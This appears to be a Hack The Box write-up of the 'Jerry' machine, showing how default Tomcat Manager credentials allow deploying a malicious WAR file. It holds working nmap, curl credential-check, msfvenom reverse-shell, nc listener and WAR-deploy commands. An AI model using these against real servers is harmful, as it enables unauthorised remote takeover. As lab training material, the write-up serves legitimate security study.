Jerry
Apache Tomcat's Manager interface was exposed with default credentials (tomcat:s3cret), allowing upload of a malicious WAR file that executed a reverse shell directly as NT AUTHORITY\SYSTEM.
Overview
Jerry is an Easy Windows box running Apache Tomcat 7.0.88 on port 8080. The Tomcat Manager application was left accessible with the well-known default credential pair tomcat:s3cret, a CWE-1188 (Initialization with Hardcoded Credentials) misconfiguration. Uploading a malicious Java WAR file through the Manager’s text API deployed a JSP reverse shell, and because Tomcat was configured to run as NT AUTHORITY\SYSTEM, the resulting shell had full control of the machine from the first connection — no lateral movement or privilege escalation required.
Machine Matrix
The Real-Life axis dominates — default Tomcat credentials and WAR-based RCE are a genuine production risk seen in real-world breaches, while the absence of a named CVE and any custom exploitation reflects how entirely tool-driven this attack chain is.
Recon
| Port | Service | Notes |
|---|---|---|
| 8080 | HTTP / Apache Tomcat 7.0.88 | Manager UI exposed at /manager/html |
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p8080 -sC -sV -Pn 10.10.10.X
Only port 8080 answers. The Tomcat default page loads immediately, and the Manager link at /manager/html prompts for Basic authentication — making credential testing the natural next step.
Enumeration
Spray common Tomcat default credential pairs against the Manager endpoint. The pair tomcat:s3cret returns HTTP 200, confirming access:
1
curl -s -o /dev/null -w "%{http_code}" -u "tomcat:s3cret" http://10.10.10.X:8080/manager/html
The Manager dashboard confirms Tomcat 7.0.88 on Windows and shows the deploy-WAR interface. The /manager/text/deploy API accepts a WAR upload over HTTP — no browser required.
Foothold
Generate a JSP reverse shell WAR payload with msfvenom:
1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=4444 -f war -o /tmp/shell.war
Start a listener:
1
nc -lvnp 4444
Deploy the WAR via the Tomcat text manager API using the confirmed credentials:
1
2
curl -s -u "tomcat:s3cret" -T /tmp/shell.war \
"http://10.10.10.X:8080/manager/text/deploy?path=/shell&update=true"
Trigger the deployed application to execute the JSP reverse shell:
1
curl -s "http://10.10.10.X:8080/shell/"
The listener catches the shell. whoami confirms nt authority\system — Tomcat was running as the Windows SYSTEM account, so full machine access is immediate.
User flag
1
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt" # HTB{...}
The shell lands directly as NT AUTHORITY\SYSTEM, giving access to both flag files from the same session — Jerry stores user and root flags together in a single file on the Administrator’s Desktop.
Privilege Escalation
No privilege escalation was required. The Tomcat service was configured to run as NT AUTHORITY\SYSTEM, so the WAR shell connected back with the highest privilege level on the system. The foothold is already full compromise.
Root flag
1
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt" # HTB{...}
Both flags are read from the same file. Full machine compromise achieved via default credentials and a WAR-based remote code execution technique — no escalation needed because the service account was never locked down.